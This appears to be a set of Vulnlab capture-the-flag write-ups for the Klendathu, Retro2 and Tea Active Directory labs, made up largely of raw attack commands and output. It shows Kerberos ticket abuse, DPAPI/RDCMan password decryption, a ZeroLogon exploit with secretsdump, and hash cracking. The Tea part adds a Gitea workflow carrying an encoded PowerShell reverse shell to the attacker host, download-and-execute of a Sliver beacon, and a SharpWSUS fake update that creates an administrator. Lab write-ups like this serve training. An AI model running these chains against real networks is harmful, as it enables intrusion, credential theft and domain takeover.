(puck㉿kali)-[~/vulnlab/klendathu] $ git clone https://github.com/ar0x4/impacket.git $ python3 -m venv venv $ source venv/bin/activate $ pip3 install -r requirements.txt (venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket] $ cp examples/getTGT.py . (venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket] $ python3 getTGT.py klendathu.vl/'leivy':'Summer2024!' -dc-ip 10.10.220.149 -principal NT_ENTERPRISE Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info" Impacket v? - Copyright 2023 Fortra [*] Saving ticket in leivy.ccache
.
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket] $ export KRB5CCNAME=leivy.ccache (venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket] $ klist Ticket cache: FILE:leivy.ccache Default principal: leivy@KLENDATHU.VL Valid starting Expires Service principal 08/29/2024 16:21:31 08/30/2024 02:21:31 krbtgt/KLENDATHU.VL@KLENDATHU.VL renew until 08/30/2024 16:21:33
We need to modify our /etc/krb5.conf
[libdefaults] default_realm = KLENDATHU.VL dns_lookup_realm = false dns_lookup_kdc = true # The following krb5.conf variables are only for MIT Kerberos. kdc_timesync = 1 ccache_type = 4 forwardable = true proxiable = true rdns = false [realms] KLENDATHU.VL = { kdc = dc1.klendathu.vl admin_server = dc1.klendathu.vl } [domain_realm] .klendathu.vl = KLENDATHU.VL klendathu.vl = KLENDATHU.VL
Now we can ssh using Kerberos authentication to srv2
after becoming root we we go in /root/inc5543_domaincontroller_backup/
and transfer this backup to our kali box
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket] $ ssh -K leivy@klendathu.vl@srv2.klendathu.vl Last failed login: Thu Aug 29 10:26:37 EDT 2024 from 10.8.2.138 on ssh:notty There was 1 failed login attempt since the last successful login. [leivy@KLENDATHU.VL@srv2 ~]$ id uid=990001115(leivy@KLENDATHU.VL) gid=990000513(domain users@KLENDATHU.VL) groups=990000513(domain users@KLENDATHU.VL),990001106(linux_admins@KLENDATHU.VL) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 [leivy@KLENDATHU.VL@srv2 /]$ sudo su [root@srv2 /]# cd /root [root@srv2 ~]# ls anaconda-ks.cfg flag.txt inc5543_domaincontroller_backup [root@srv2 ~]# cat flag.txt VL{8c<redacted>fd} [root@srv2 ~]# cd inc5543_domaincontroller_backup/ [root@srv2 inc5543_domaincontroller_backup]# ls 'Active Directory' note.txt registry [root@srv2 inc5543_domaincontroller_backup]# cat note.txt Incident: INC5543 I've included a backup of the domain controller before resetting all passwords after the last breach [root@srv2 inc5543_domaincontroller_backup]#
transfer /tmp/krb5cc_990001135 file to kali
Decrypting RDCMan password
┌──(puck㉿kali)-[~/vulnlab/klendathu] └─$ export KRB5CCNAME=krb5cc_990001135 ┌──(puck㉿kali)-[~/vulnlab/klendathu] └─$ klist Ticket cache: FILE:krb5cc_990001135 Default principal: svc_backup@KLENDATHU.VL Valid starting Expires Service principal 08/29/2024 16:37:51 08/30/2024 02:37:51 krbtgt/KLENDATHU.VL@KLENDATHU.VL renew until 09/05/2024 16:37:51 ┌──(puck㉿kali)-[~/vulnlab/klendathu] └─$ impacket-smbclient klendathu.vl/svc_backup@dc1.klendathu.vl -k -no-pass Impacket v0.12.0.dev1 - Copyright 2023 Fortra Type help for list of commands # shares ADMIN$ C$ HomeDirs IPC$ NETLOGON SYSVOL # use HomeDirs # cd Jenkins # ls drw-rw-rw- 0 Sat Apr 13 03:32:21 2024 . drw-rw-rw- 0 Thu Apr 11 02:58:10 2024 .. -rw-rw-rw- 101234 Sat Apr 13 03:32:11 2024 AppData_Roaming_Backup.zip -rw-rw-rw- 1077 Fri Apr 12 06:08:35 2024 jenkins.rdg # get jenkins.rdg # get AppData_Roaming_Backup.zip
.
Decrypt a .rdg password using ntdissector and dpapilab
We tranfers the content of ‘HomeDirs/JENKINS’ : to our kali box
we unzip AppData_Roaming_Backup.zip , and cat jenkins.rdg
<?xml version="1.0" encoding="utf-8"?> <RDCMan programVersion="2.93" schemaVersion="3"> <file> <credentialsProfiles> <credentialsProfile inherit="None"> <profileName scope="Local">KLENDATHU\administrator</profileName> <userName>administrator</userName> <password>AQ[...]ShAxQ==</password> <domain>KLENDATHU</domain> </credentialsProfile> </credentialsProfiles> <properties> <expanded>True</expanded> <name>jenkins</name> </properties> <server> <properties> <name>dc1.klendathu.vl</name> </properties> <logonCredentials inherit="None"> <profileName scope="File">KLENDATHU\administrator</profileName> </logonCredentials> </server> </file> <connected /> <favorites /> <recentlyUsed /> </RDCMan>
So we have a encrypted password
After extracting the .zip wealso have the path of master keys “./Roaming/Microsoft/Protect”
Next i used a Ubuntu box to do this decrypting
.
puck@edge-meppel:~$ python3 -m venv venv puck@edge-meppel:~$ source venv/bin/activate (venv) puck@edge-meppel:~$ cd ntdissector/ (venv) puck@edge-meppel:~/ntdissector$ ntdissector -h usage: ntdissector [-h] [-V] [-system SYSTEM] -ntds NTDS [-bootKey BOOTKEY] [-outputdir OUTPUTDIR] [-cachedir CACHEDIR] [-f FILTER] [-filters] [-limit LIMIT] [-cn] [-debug] [-verbose] [-silent] [-ts] [-keepDel] [-w WORKERS] [-nocache] [-dryRun] NTDS Dissector v1.0 options: -h, --help show this help message and exit -V, --version Display version info Examples: > Dump users, groups and domain backup keys $ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user,group,secret > Dump all records from the database $ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f all > Dump user objects and include deleted records $ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user -keepDel > List object classes available to filter records $ ntdissector -ntds NTDS.dit -filters (venv) puck@edge-meppel:~/ntdissector$ ntdissector -ntds /home/puck/ntds.dit -system /home/puck/SYSTEM -outputdir /tmp/t est -ts -f all [2024-08-30 15:25:27] [-] Couldn't load cache file /home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json -> [Errno 2] No such file or directory: '/home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json' [2024-08-30 15:25:27] [*] Building the schemas, please wait... [2024-08-30 15:25:29] [*] PEK # 0 found and decrypted: feab48d5655b005f0fed603c166c587f [2024-08-30 15:25:29] [*] Filtering records with this list of object classes : ['all'] [2024-08-30 15:25:29] [*] Ignoring records marked as deleted 100%|███████████████████████████████████████████████████████████████████████████| 3747/3747 [00:00<00:00, 7281.52rec./s] [2024-08-30 15:25:30] [*] Finished, matched 3708 records out of 3747 [2024-08-30 15:25:30] [*] Processing 3708 serialization tasks 100%|████████████████████████████████████████████████████████████████████████████| 3708/3708 [00:17<00:00, 192.28rec./s] (venv) puck@edge-meppel:~/ntdissector$
.
(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$ cat secret.json | jq { "lastSetTime": "2024-04-10T23:33:43.254871+00:00", "priorSetTime": "2024-04-10T23:33:43.254871+00:00", "dSCorePropagationData": "1601-01-01T00:00:00+00:00", "isCriticalSystemObject": 1, "showInAdvancedViewOnly": 1, "distinguishedName": "CN=BCKUPKEY_e6630be8-09ee-4a28-bcb1-e725e585d832 Secret,CN=System,DC=KLENDATHU,DC=VL", "objectClass": [ "secret", "leaf", "top" ], "replPropertyMetaData": "01000000000000000c000000000000000000000001000000d7b2271c03000000c98b69a9c485a44f8204cfa32ce1e18e2<redacted>0010500000000000515000000bb79422646d3736071c6002d00020000", "objectGUID": "2a015493-fc08-40bc-b15e-d6936ba6bc59", "objectCategory": "CN=Secret,CN=Schema,CN=Configuration,DC=KLENDATHU,DC=VL" } (venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$
rdgdecrypt
(venv) puck@edge-meppel:~$ python3 ./rdgdec.py ./jenkins.rdg --masterkey /home/puck/Roaming/Microsoft/Protect/S-1-5-21-641890747-1618203462-755025521-1110 --sid S-1-5-21-641890747-1618203462-755025521-1110 -k ./pvk.key [+] Profile: KLENDATHU\administrator Username: administrator Domain: KLENDATHU Password: @@M<redacted>s@@ ------------------------------------------------------------------------------- [+] Decrypted 1 out of 1 credentials
What a ride !
used links:
https://github.com/ar0x4/impacket.git
https://github.com/synacktiv/ntdissector
https://github.com/tijldeneut/dpapilab-ng
.
vulnlab-retro2
vulnlab-retro2
Retro2 is an easy old-school Windows 2008 DC , that involves decrypting MSAccess database, Pre-Created Computer Accounts, GenericWrite, AddMember & Perfusion.exe
nmap scan
# Nmap 7.93 scan initiated Wed Aug 28 09:41:18 2024 as: nmap -Pn -sC -sV -oN retro2.nmap 10.10.122.16 Nmap scan report for 10.10.122.16 Host is up (0.019s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-28 07:41:28Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 210: |_ Message signing enabled and required |_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: -1s | smb-os-discovery: | OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: BLN01 | NetBIOS computer name: BLN01\x00 | Domain name: retro2.vl | Forest name: retro2.vl | FQDN: BLN01.retro2.vl |_ System time: 2024-08-28T09:42:17+02:00 | smb2-time: | date: 2024-08-28T07:42:18 |_ start_date: 2024-08-28T07:40:52 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Aug 28 09:42:57 2024 -- 1 IP address (1 host up) scanned in 99.04 seconds
unintended zerologon
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ python3 cve-2020-1472-exploit.py bln01 10.10.122.16 Performing authentication attempts... =============================================================================================== Target vulnerable, changing account password to empty string Result: 0 Exploit complete!
netexec
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ impacket-secretsdump -just-dc -no-pass bln01\$@10.10.122.16 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:c0<redacted>48:::
enumerate SMB shares
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ netexec smb 10.10.122.16 SMB 10.10.122.16 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ netexec smb 10.10.122.16 -u 'puck' -p '' --shares SMB 10.10.122.16 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) SMB 10.10.122.16 445 BLN01 [+] retro2.vl\puck: SMB 10.10.122.16 445 BLN01 [*] Enumerated shares SMB 10.10.122.16 445 BLN01 Share Permissions Remark SMB 10.10.122.16 445 BLN01 ----- ----------- ------ SMB 10.10.122.16 445 BLN01 ADMIN$ Remote Admin SMB 10.10.122.16 445 BLN01 C$ Default share SMB 10.10.122.16 445 BLN01 IPC$ Remote IPC SMB 10.10.122.16 445 BLN01 NETLOGON Logon server share SMB 10.10.122.16 445 BLN01 Public READ SMB 10.10.122.16 445 BLN01 SYSVOL Logon server share
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ impacket-smbclient guest@retro2.vl -no-pass Impacket v0.12.0.dev1 - Copyright 2023 Fortra Type help for list of commands # use Public # ls drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 . drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 .. drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 DB drw-rw-rw- 0 Sat Aug 17 13:58:07 2024 Temp # cd DB # ls drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 . drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 .. -rw-rw-rw- 876544 Sat Aug 17 16:30:34 2024 staff.accdb # get staff.accdb
If we open it with Microsoft Access, it prompts for a password. We use office2john to extract the hash and then crack it.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ office2john staff.accdb | tee officehash staff.accdb:$office$*2013*100000*256*16*5736<redacted>8235 ┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ john officehash.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES]) Cost 1 (MS Office version) is 2013 for all loaded hashes Cost 2 (iteration count) is 100000 for all loaded hashes Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:03 0.00% (ETA: 06:07:07) 0g/s 223.4p/s 223.4c/s 223.4C/s bambam..james1 cl<redacted>08 (staff.accdb)
in accesdb we find
strsUser = “retro2\ldapreader”
strsPassword = “pp<redacted>5R”
Bloodhound analyze
bloodhound-python -d retro2.vl -c all -u ldapreader -p pp<redacted>5R -ns 10.10.122.16 --dns-tcp --zip
we find:
The computer Account FS01 is a member of the Domain Computers group. The Domain Computers group has GenericWrite over ADMWS01. ADMWS01 has the AddSelf permission over the Services group. Services group members can RDP to DC BLN01
.
we have guessed pasword computer is same as computername FS01 ,we cannot use this computer account, because the password has not been changed. so we use rpcchangepwd.py
wget https://raw.githubusercontent.com/api0cradle/impacket/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6/examples/rpcchangepwd.py
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ python3 rpcchangepwd.py retro2.vl/fs01\$:fs01@10.10.122.16 -newpass P@ssw0rd Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Password was changed successfully.
abuse the GenericWrite permission
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ netexec smb retro2.vl -u 'fs01$' -p 'P@ssw0rd' SMB 10.10.122.16 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) SMB 10.10.122.16 445 BLN01 [+] retro2.vl\fs01$:P@ssw0rd
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ net rpc password 'ADMWS01$' Passw0rd1 -U retro2.vl/'fs01$'%P@ssw0rd -S bln01.retro2.vl
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ netexec smb retro2.vl -u 'ADMWS01$' -p 'P@ssw0rd' SMB 10.10.122.16 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) SMB 10.10.122.16 445 BLN01 [-] retro2.vl\ADMWS01$:P@ssw0rd STATUS_LOGON_FAILURE
.
with BloodyAD we add ‘ldapreader’ to the Services group
┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD] └─$ python3 bloodyAD.py --host 10.10.122.16 -d retro2.vl -u 'ADMWS01$' -p 'Passw0rd1' add groupMember 'SERVICES' 'ldapreader' [+] ldapreader added to SERVICES
now we can RDP into the box
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ xfreerdp /u:'ldapreader' /p:'pp<redacted>5R' /v:10.10.122.16 /d:retro2.vl /tls-seclevel:0
Privesc
Any local user can create a Performance
subkey and then leverage the Windows Performance Counters to load an arbitrary DLL in the context of the WMI service as NT AUTHORITY\SYSTEM
(hence the tool’s name).
c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/Perfusion.exe Perfusion .exe **** Online **** CertUtil: -URLCache command completed successfully. c:\temp> .\Perfusion.exe -c cmd -i [*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_ 2844_2224_2.dll [*] Created Performance registry key. [*] Triggered Performance data collection. [+] Exploit completed. Got a SYSTEM token! :) [*] Waiting for the Trigger Thread to terminate... OK [!] Failed to delete Performance registry key. [*] Deleted Performance DLL. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\temp>whoami nt authority\system c:\temp>type c:\users\administrator\desktop\root.txt VL{fc<redacted>46}
That was oldschool fun
Protected: vulnlab-if-private
vulnlab-tea
vulnlab-tea
a medium rated AD chain machine, involved srv.tea.vl having an instance of gitea running which had an active runner, being able to register a user and enable actions on the repo, we can execute commands to get a reverse shell, -> Get-LapsADPassword -> SharpWSUS.exe -> domain admin on dc.tea.vl.
.
giteabuild
Create .gitea/workflows/demo.yaml
file in the repository that we have created.
http://srv.tea.vl:3000/puck/puck/src/branch/main/.gitea/workflows/demo.yaml
name: Build run-name: ${{ gitea.actor }} running build job on: [push] jobs: Explore-Gitea-Actions: runs-on: windows-latest steps: - run: echo "🍏 This job's status is ${{ job.status }}." - run: powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
catch with netcat
┌──(puck㉿kali)-[~/vulnlab/tea] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.191.134] 50061 PS C:\Users\thomas.wallace\.cache\act\63805091085fb29f\hostexecutor> whoami tea\thomas.wallace
download & execute Beacon
PS C:\_install> iwr http://10.8.2.138:8000/beacon.exe -o beacon.exe PS C:\_install> PS C:\_install> ./beacon.exe
Sliver
┌──(puck㉿kali)-[~/vulnlab/tea] └─$ sliver Connecting to localhost:31337 ... [*] Loaded 21 aliases from disk [*] Loaded 128 extension(s) from disk ███████╗██╗ ██╗██╗ ██╗███████╗██████╗ ██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗ ███████╗██║ ██║██║ ██║█████╗ ██████╔╝ ╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗ ███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║ ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝ All hackers gain vigilance [*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df [*] Welcome to the sliver shell, please type 'help' for options [*] Check for updates with the 'update' command sliver > https --lport 8443 [*] Starting HTTPS :8443 listener ... [*] Successfully started job #1 sliver > jobs ID Name Protocol Port Stage Profile ==== ======= ========== ====== =============== 1 https tcp 8443 sliver > generate beacon --seconds 5 --jitter 3 --os windows --arch amd64 --format EXECUTABLE --http 10.8.2.138:8443 --name tea-3 --save /tmp/beacon.exe -G --skip-symbols [*] Generating new windows/amd64 beacon implant binary (5s) [!] Symbol obfuscation is disabled [*] Build completed in 2s [*] Implant saved to /tmp/beacon.exe sliver > jobs ID Name Protocol Port Stage Profile ==== ======= ========== ====== =============== 1 https tcp 8443 [*] Beacon 9d553a10 tea-3 - 10.10.191.134:50348 (SRV) - windows/amd64 - Tue, 20 Aug 2024 10:25:18 CEST sliver > use 9d553a10 [*] Active beacon tea-3 (9d553a10-504e-4b41-927f-34a21b1a94bc) sliver (tea-3) > ls [*] Tasked beacon tea-3 (2cdcbb9d) [+] tea-3 completed task 2cdcbb9d C:\_install (6 items, 24.0 MiB) =============================== -rw-rw-rw- beacon.exe 10.5 MiB Tue Aug 20 01:16:47 -0700 2024 -rw-rw-rw- beacon2.exe 10.5 MiB Tue Aug 20 01:24:56 -0700 2024 -rw-rw-rw- LAPS.x64.msi 1.1 MiB Sun Dec 24 06:37:30 -0700 2023 -rw-rw-rw- LAPS_OperationsGuide.docx 626.3 KiB Sun Dec 24 06:37:39 -0700 2023 -rw-rw-rw- PsExec64.exe 813.9 KiB Sun Oct 22 06:03:38 -0700 2023 -rw-rw-rw- PsInfo64.exe 523.4 KiB Sun Dec 24 06:38:30 -0700 2023 sliver (tea-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup [*] Tasked beacon tea-3 (6338fcbb) [+] tea-3 completed task 6338fcbb [*] sharp-hound-4 output: 2024-08-20T01:27:54.2810142-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound 2024-08-20T01:27:54.9376664-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices --snip-- 2024-08-20T01:28:41.7584223-07:00|INFORMATION|Status: 309 objects finished (+309 6.866667)/s -- Using 69 MB RAM 2024-08-20T01:28:41.7687327-07:00|INFORMATION|Enumeration finished in 00:00:45.8844244 2024-08-20T01:28:41.8847345-07:00|INFORMATION|Saving cache with stats: 250 ID to type mappings. 254 name to SID mappings. 2 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2024-08-20T01:28:41.9476974-07:00|INFORMATION|SharpHound Enumeration Completed at 1:28 AM on 8/20/2024! Happy Graphing! [*] Output saved to /tmp/sharp-hound-4_.3130027413.log sliver (tea-3) > ls [*] Tasked beacon tea-3 (3f00e892) [+] tea-3 completed task 3f00e892 C:\_install (8 items, 24.0 MiB) =============================== -rw-rw-rw- 20240820012840_BloodHound.zip 23.2 KiB Tue Aug 20 01:28:41 -0700 2024 -rw-rw-rw- beacon.exe 10.5 MiB Tue Aug 20 01:16:47 -0700 2024 -rw-rw-rw- beacon2.exe 10.5 MiB Tue Aug 20 01:24:56 -0700 2024 -rw-rw-rw- LAPS.x64.msi 1.1 MiB Sun Dec 24 06:37:30 -0700 2023 -rw-rw-rw- LAPS_OperationsGuide.docx 626.3 KiB Sun Dec 24 06:37:39 -0700 2023 -rw-rw-rw- NjdkNDliNTgtOWQ5Mi00ZTViLWI2NzctOWJlODE4OTM4ZGMy.bin 42.8 KiB Tue Aug 20 01:28:41 -0700 2024 -rw-rw-rw- PsExec64.exe 813.9 KiB Sun Oct 22 06:03:38 -0700 2023 -rw-rw-rw- PsInfo64.exe 523.4 KiB Sun Dec 24 06:38:30 -0700 2023 sliver (tea-3) > download 20240820012840_BloodHound.zip [*] Tasked beacon tea-3 (d8c023fe) [+] tea-3 completed task d8c023fe [*] Wrote 23731 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/tea/20240820012840_BloodHound.zip sliver (tea-3) > ┌──(puck㉿kali)-[~/vulnlab/tea]
.
sliver (tea-3) > interactive [*] Using beacon's active C2 endpoint: https://10.8.2.138:8443 [*] Tasked beacon tea-3 (d48d0ac7) [*] Session 67a7541b tea-3 - 10.10.163.246:53086 (SRV) - windows/amd64 - Thu, 22 Aug 2024 09:21:51 CEST sliver (tea-3) > use 67a7541b-db54-4c92-a36a-b6baec828a14 [*] Active session tea-3 (67a7541b-db54-4c92-a36a-b6baec828a14) sliver (tea-3) > shell ? This action is bad OPSEC, are you an adult? Yes [*] Wait approximately 10 seconds after exit, and press <enter> to continue [*] Opening shell tunnel (EOF to exit) ... [*] Started remote shell with pid 4600 PS C:\_install> Get-LAPSADPassword -Identity SRV -AsPlainText Get-LAPSADPassword -Identity SRV -AsPlainText ComputerName : SRV DistinguishedName : CN=SRV,OU=Servers,DC=tea,DC=vl Account : Administrator Password : %t50Z))o4+0Z;6 PasswordUpdateTime : 8/21/2024 11:53:03 PM ExpirationTimestamp : 9/20/2024 11:53:03 PM Source : EncryptedPassword DecryptionStatus : Success AuthorizedDecryptor : TEA\Server Administration PS C:\_install>
.
.
netexec winrm srv.tea.vl -u administrator -p 'rr<redacted>S9' --local WINRM 10.10.191.134 5985 SRV [*] Windows Server 2022 Build 20348 (name:SRV) (domain:tea.vl) WINRM 10.10.191.134 5985 SRV [+] SRV\administrator:rr<redacted>S9 (Pwn3d!)
.
evil-winrm -i srv.tea.vl -u administrator -p 'rr<redacted>S9'
or
xfreerdp /u:Administrator /p:rr<redacted>S9 /w:1566 /h:968 /v:srv.tea.vl:3389
not finished yet
iwr http://10.8.2.138:8000/SharpWSUS.exe -o sharpwsus.exe
.
SharpWSUS
sharpwsus locate sharpwsus inspect sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21" /date:2024-08-23 /kb:700123 /rating:Important /description:"Really important update" /url:"https://google.com" sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2" sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"
.
.
C:\_install>sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21" ____ _ __ ______ _ _ ____ / ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___| \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) | |____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team [*] Action: Create Update C:\WSUS-Updates\WsusContent [*] Creating patch to use the following: [*] Payload: psexec64.exe [*] Payload Path: C:\Users\Administrator\Documents\psexec64.exe [*] Arguments: -accepteula -s -d cmd.exe /c \net [*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \net ################# WSUS Server Enumeration via SQL ################## ServerName, WSUSPortNumber, WSUSContentLocation ----------------------------------------------- SRV, 8530, C:\WSUS-Updates\WsusContent ImportUpdate Update Revision ID: 198781 PrepareXMLtoClient InjectURL2Download DeploymentRevision PrepareBundle PrepareBundle Revision ID: 198782 PrepareXMLBundletoClient DeploymentRevision [*] Update created - When ready to deploy use the following command: [*] SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name" [*] To check on the update status use the following command: [*] SharpWSUS.exe check /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN [*] To delete the update use the following command: [*] SharpWSUS.exe delete /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name" [*] Create complete There is no such global user or group: puck. There is no such global user or group: " /title:Great. There is no such global user or group: UpdateC21. More help is available by typing NET HELPMSG 3783. C:\_install>SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:dc.tea.vl 